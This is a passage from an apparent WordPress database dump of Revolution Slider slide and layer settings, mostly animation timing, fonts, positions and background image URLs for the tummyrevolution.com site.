attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":500},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":500,\"startRelative\":500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":500,\"startRelative\":500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#7a7a7a\",\"e\":true},\"n\":{\"v\":\"#7a7a7a\",\"e\":true},\"t\":{\"v\":\"#7a7a7a\",\"e\":true},\"m\":{\"v\":\"#7a7a7a\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"18px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"22px\",\"e\":true},\"m\":{\"v\":\"20px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#7a7a7a\",\"e\":true},\"n\":{\"v\":\"#7a7a7a\",\"e\":true},\"t\":{\"v\":\"#7a7a7a\",\"e\":true},\"m\":{\"v\":\"#7a7a7a\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"[qodef_button text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button text=\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"282px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"345px\",\"e\":true},\"n\":{\"v\":\"181px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"422px\",\"e\":true},\"n\":{\"v\":\"337px\",\"e\":true},\"t\":{\"v\":\"195px\",\"e\":true},\"m\":{\"v\":\"215px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":800},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1200,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(15,7,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h8-slide1-background.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"01\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[\"default\"]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','[]','{\"0\":\"\",\"version\":\"6.6.0\"}'),(16,7,2,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h8-slide2-background.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"02\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[\"default\"]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','[]','{\"0\":\"\",\"version\":\"6.6.0\"}'),(17,7,3,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h8-slide3-backgroun.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[\"default\"]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','[]','{\"0\":\"\",\"version\":\"6.6.0\"}'),(18,8,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"position\":\"left center\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide1-graphic1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"transition\":[\"parallaxtobottom\"],\"slots\":[\"default\"],\"duration\":[\"default\"]},\"panzoom\":{\"ease\":\"power3.out\",\"fitEnd\":\"110\",\"fitStart\":\"105\"},\"nav\":{\"bullets\":{\"presets\":{\"bullet-size-def\":true,\"bullet-size\":\"12\"}}},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Image 1\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide1-graphic2.png\",\"imageId\":593},\"size\":{\"width\":{\"d\":{\"v\":\"491px\",\"e\":true},\"n\":{\"v\":\"298px\",\"e\":true},\"t\":{\"v\":\"300px\",\"e\":true},\"m\":{\"v\":\"199px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"427px\",\"e\":true},\"n\":{\"v\":\"258px\",\"e\":true},\"t\":{\"v\":\"261px\",\"e\":true},\"m\":{\"v\":\"173px\",\"e\":true}},\"originalWidth\":491,\"originalHeight\":427,\"aspectRatio\":{\"d\":{\"v\":1.1498829039812646},\"n\":{\"v\":1.1498829039812646},\"t\":{\"v\":1.1498829039812646},\"m\":{\"v\":1.1498829039812646}}},\"position\":{\"x\":{\"d\":{\"v\":\"525px\",\"e\":true},\"n\":{\"v\":\"350px\",\"e\":true},\"t\":{\"v\":\"-184px\",\"e\":true},\"m\":{\"v\":\"20px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"256px\",\"e\":true},\"n\":{\"v\":\"135px\",\"e\":true},\"t\":{\"v\":\"-305px\",\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":1000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power1.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power1.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":580,\"start\":1000,\"startRelative\":-600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(19,8,2,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"position\":\"left center\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide2-graphic1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"transition\":[\"parallaxtobottom\"],\"slots\":[\"default\"],\"duration\":[\"default\"]},\"panzoom\":{\"ease\":\"power3.out\",\"fitEnd\":\"110\",\"fitStart\":\"105\"},\"nav\":{\"bullets\":{\"presets\":{\"bullet-size-def\":true,\"bullet-size\":\"12\"}}},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"3\":{\"text\":\"Image 2\",\"alias\":\"Graphic\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide2-graphic2.png\",\"imageId\":611},\"size\":{\"width\":{\"d\":{\"v\":\"441px\",\"e\":true},\"n\":{\"v\":\"256px\",\"e\":true},\"t\":{\"v\":\"400px\",\"e\":true},\"m\":{\"v\":\"251px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"434px\",\"e\":true},\"n\":{\"v\":\"252px\",\"e\":true},\"t\":{\"v\":\"393px\",\"e\":true},\"m\":{\"v\":\"247px\",\"e\":true}},\"originalWidth\":441,\"originalHeight\":434,\"aspectRatio\":{\"d\":{\"v\":1.0161290322580645},\"n\":{\"v\":1.0161290322580645},\"t\":{\"v\":1.0161290322580645},\"m\":{\"v\":1.0161290322580645}}},\"position\":{\"x\":{\"d\":{\"v\":\"-481px\",\"e\":true},\"n\":{\"v\":\"-275px\",\"e\":true},\"t\":{\"v\":\"142px\",\"e\":true},\"m\":{\"v\":\"-14px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-158px\",\"e\":true},\"n\":{\"v\":\"-131px\",\"e\":true},\"t\":{\"v\":\"124px\",\"e\":true},\"m\":{\"v\":\"-105px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power1.inOut\",\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power1.inOut\",\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":580,\"start\":2000,\"startRelative\":1000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"